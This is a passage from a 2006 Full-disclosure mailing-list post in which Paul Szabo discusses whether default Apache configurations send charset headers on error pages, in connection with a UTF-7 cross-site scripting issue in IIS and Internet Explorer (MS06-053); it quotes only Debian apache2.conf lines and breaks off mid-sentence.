or +603-6203 5920 www.mynetsec.com From psz at maths.usyd.edu.au Mon Oct 2 22:55:39 2006 From: psz at maths.usyd.edu.au (Paul Szabo) Date: Tue, 3 Oct 2006 07:55:39 +1000 Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]) In-Reply-To: <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com> Message-ID: <200610022155.k92LtdBZ024429@asti.maths.usyd.edu.au> Brian Eaton wrote: > ... I just tested Apache 1.3.37 and Apache 2.2.3, and both specified a > content-type header of "text/html; charset=iso-8859-1" for 404 responses ... So, how "default" were your servers? On my own server (Debian package apache2-common version 2.0.54-5sarge1) I see in apache2.conf: Alias /error/ "/usr/share/apache2/error/" ... ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var ... but those modules are not mentione